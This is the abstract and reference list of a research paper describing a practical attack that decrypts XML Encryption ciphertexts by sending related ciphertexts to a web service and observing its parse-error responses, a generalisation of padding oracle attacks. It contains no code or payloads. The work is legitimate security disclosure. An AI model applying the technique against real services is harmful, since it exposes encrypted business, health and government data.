How to break XML encryption

XML Encryption was standardized by W3C in 2002, and is implemented in XML frameworks of major commercial and open-source organizations like Apache, redhat, IBM, and Microsoft. It is employed in a large number of major web-based applications, ranging from business communications, e-commerce, and financial services over healthcare applications to governmental and military infrastructures. In this work we describe a practical attack on XML Encryption, which allows to decrypt a ciphertext by sending related ciphertexts to a Web Service and evaluating the server response. We show that an adversary can decrypt a ciphertext by performing only 14 requests per plaintext byte on average. This poses a serious and truly practical security threat on all currently used implementations of XML Encryption. In a sense the attack can be seen as a generalization of padding oracle attacks (Vaudenay, Eurocrypt 2002). It exploits a subtle correlation between the block cipher mode of operation, the character encoding of encrypted text, and the response behaviour of a Web Service if an XML message cannot be parsed correctly.

[1]  C. M. Sperberg-McQueen,et al.  Extensible Markup Language (XML) , 1997, World Wide Web J..

[2]  Thuan L. Thai,et al.  NET framework essentials , 2001 .

[3]  Donald E. Eastlake,et al.  XML-Signature Syntax and Processing , 2001, RFC.

[4]  John Black,et al.  Side-Channel Attacks on Symmetric Encryption Schemes: The Case for Authenticated Encryption , 2002, USENIX Security Symposium.

[5]  Serge Vaudenay,et al.  Security Flaws Induced by CBC Padding - Applications to SSL, IPSEC, WTLS , 2002, EUROCRYPT.

[6]  Jean Jacques Moreau,et al.  SOAP Version 1. 2 Part 1: Messaging Framework , 2003 .

[7]  Mark O'Neill,et al.  Web Services Security , 2003 .

[8]  D. Eastlake,et al.  XML Encryption Syntax and Processing , 2003 .

[9]  Phillip Hallam-Baker,et al.  Web services security: soap message security , 2003 .

[10]  Kenneth G. Paterson,et al.  Padding Oracle Attacks on the ISO CBC Mode Encryption Standard , 2004, CT-RSA.

[11]  Chris J. Mitchell,et al.  Error Oracle Attacks on CBC Mode: Is There a Future for CBC Mode Encryption? , 2005, ISC.

[12]  Kenneth G. Paterson,et al.  Padding Oracle Attacks on CBC-Mode Encryption with Secret and Random IVs , 2005, FSE.

[13]  Michael McIntosh,et al.  XML signature element wrapping attacks and countermeasures , 2005, SWS '05.

[14]  Kenneth G. Paterson,et al.  Attacking the IPsec Standards in Encryption-only Configurations , 2007, 2007 IEEE Symposium on Security and Privacy (SP '07).

[15]  Kenneth G. Paterson,et al.  Immunising CBC Mode Against Padding Oracle Attacks: A Formal Security Treatment , 2008, SCN.

[16]  Kenneth G. Paterson,et al.  On the (in)security of IPsec in MAC-then-encrypt configurations , 2010, CCS '10.

[17]  Thai Duong,et al.  Practical Padding Oracle Attacks , 2010, WOOT.

[18]  Thai Duong,et al.  Cryptography in the Web: The Case of Cryptographic Design Flaws in ASP.NET , 2011, 2011 IEEE Symposium on Security and Privacy.